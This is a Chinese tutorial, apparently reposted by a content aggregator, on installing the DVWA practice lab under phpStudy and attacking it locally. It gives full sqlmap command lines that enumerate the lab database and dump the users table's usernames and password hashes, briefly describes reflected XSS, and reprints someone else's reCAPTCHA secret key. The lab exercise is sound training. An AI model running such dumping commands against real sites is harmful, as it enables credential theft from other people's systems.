phpstudy配置dvwa——sql注入、xss攻击练习
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了phpstudy配置dvwa——sql注入、xss攻击练习,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含2451字,纯文字阅读大概需要4分钟。
内容图文
![phpstudy配置dvwa——sql注入、xss攻击练习](/upload/InfoBanner/zyjiaocheng/864/bb2d836e2b1d42568cdd7ec6e009e303.jpg)
phpstudy配置dvwa
首先进入网站下载phpstudy:https://www.xp.cn/download.html
安装完成后下载DVWA:https://dvwa.co.uk/,将DVWA解压在phpstudy目录下的WWW目录,然后将文件夹命名为DVWA,然后进入DVWA\config目录,更改配置文件为config.inc.php
编辑 dvwa/config/config.inc.php这个配置文件
$_DVWA[ ‘recaptcha_public_key’ ] = ‘’;
$_DVWA[ ‘recaptcha_private_key’ ] = ‘’;
key可以自己生成,地址是
https://www.google.com/recaptcha/admin/create
借用一下别人生成的
Site key:
6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb
Secret key:
6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K
把key填上就行了
$_DVWA[ ‘recaptcha_public_key’ ] = ‘6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb’;
$_DVWA[ ‘recaptcha_private_key’ ] = ‘6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K’;
原文链接:https://blog.csdn.net/RBPicsdn/article/details/80059132
然后进入phpstudy目录下的Extensions\php\php7.3.4nts目录,编辑php.ini,ctrl+F搜索allow_
保存退出,打开phpstudy
进入http://127.0.0.1/DVWA/setup.php,创建一下。然后登陆,登录账号名称为admin password
sql注入练习
安装sqlmap:http://sqlmap.org/ python环境:https://www.python.org/downloads/
登录后选择SQL Injection板块,F12-network,随便提交一个数据,进行抓取cookie
将cookie复制下来,然后cmd进入sqlmap文件夹下,输入:
sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low; PHPSESSID=d24irf2jas287lkua6k4to98mb" --dbs
然后一路y同意,即可检索出数据库。
爆表名
因为我们是dvwa,所以数据库名选择dvwa,然后爆dvwa的表名
sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low; PHPSESSID=d24irf2jas287lkua6k4to98mb" -D dvwa --tables
我们肯定是对users感兴趣啊,要的就是账号和密码,所以接下来爆users中的列名
sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low; PHPSESSID=d24irf2jas287lkua6k4to98mb" -D dvwa -T users --columns
得到列名如下,我们感兴趣的是user和password:
爆账号和密码
接下来就是爆user和password中的数据了,这里我想说的是,你可以在爆数据的时候直接MD5解密,到时候会有选项提示,问你是否用kali中自带的字典进行解密
sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low; PHPSESSID=d24irf2jas287lkua6k4to98mb" -D dvwa -T users -C user,password --dump
最终得到账号和密码,达到目的
xss攻击dvwa
调成low难度后,在xss(reflected)里,输入什么返回什么,而GET传参,未出现明显的过滤,输入提交后有明显弹窗。
更多请参考:https://blog.csdn.net/h1012946585/article/details/82500018
内容总结
以上是互联网集市为您收集整理的phpstudy配置dvwa——sql注入、xss攻击练习全部内容,希望文章能够帮你解决phpstudy配置dvwa——sql注入、xss攻击练习所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。